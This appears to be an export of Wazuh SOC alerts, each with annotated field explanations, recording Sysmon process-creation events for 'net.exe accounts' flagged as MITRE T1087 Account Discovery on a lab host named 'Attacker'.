🕒 2025-04-24T22:41:59.107+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:59.107+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534519.2163095
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:56.6411308Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  288443
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:41:56.629 ProcessGuid: {94294ddc-be34-680a-ff0b-000000000e00} ProcessId: 9628 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:41:56.629
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be34-680a-ff0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9628
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:59.122+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:59.122+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534519.2168328
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:57.1756159Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  288447
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:41:57.169 ProcessGuid: {94294ddc-be35-680a-020c-000000000e00} ProcessId: 17256 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be34-680a-ff0b-000000000e00} ParentProcessId: 9628 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:41:57.169
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be35-680a-020c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  17256
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be34-680a-ff0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9628
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:59.155+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:59.155+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534519.2173383
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:57.2713241Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  288452
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:41:57.264 ProcessGuid: {94294ddc-be35-680a-030c-000000000e00} ProcessId: 10832 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:41:57.264
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be35-680a-030c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10832
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:59.188+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:59.188+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534519.2178620
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:57.3746343Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  288454
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:41:57.369 ProcessGuid: {94294ddc-be35-680a-050c-000000000e00} ProcessId: 11376 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be35-680a-030c-000000000e00} ParentProcessId: 10832 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:41:57.369
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be35-680a-050c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11376
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be35-680a-030c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10832
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:59.252+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:59.252+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
